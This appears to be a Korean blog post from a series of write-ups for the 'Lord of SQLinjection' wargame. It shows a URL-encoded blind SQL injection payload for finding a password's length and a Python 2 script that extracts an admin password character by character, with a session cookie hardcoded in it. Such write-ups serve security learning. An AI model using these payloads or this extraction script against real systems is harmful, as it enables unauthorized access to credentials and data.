pw 길이 : %27||ascii(id)-103%26%26length(pw)=8%23
tip : &는 get으로 보낼때 urlencoding을 하지 않으면 파라미터 연산자인줄 알고 &뒤에 온 값을 파라미터값으로 인식한다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | import urllib, urllib2result = ""for i in range(1, 9): for j in range(33,127): payload = "%27||ascii(id)-103%26%26if(ascii(substr(pw,{},1))={},1,1=2)%23".format(i, j) testurl = url + payload print testurl req = urllib2.Request(testurl) req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11') req.add_header('Cookie','__cfduid=d4cc8c809fb82627de6749e5eaac73e1f1500957474; PHPSESSID=498v4fb9opfr78vauqu83eq635') res = urllib2.urlopen(req).read() if "Hello admin" in res: print "[*]Find!" result += chr(j) breakprint "[+]FIND FLAG! : {}".format(result) |
'Wargame > lord of sqlinjection' 카테고리의 다른 글
| Lord of SQLinjection vampire (0) | 2017.07.25 |
|---|---|
| Lord of SQLinjection Troll (0) | 2017.07.25 |
| Lord of SQLinjection Darkelf (0) | 2017.07.25 |
| Lord of SQLinejction wolfman (0) | 2017.07.25 |
| Lord of SQLinjection orc (0) | 2017.07.25 |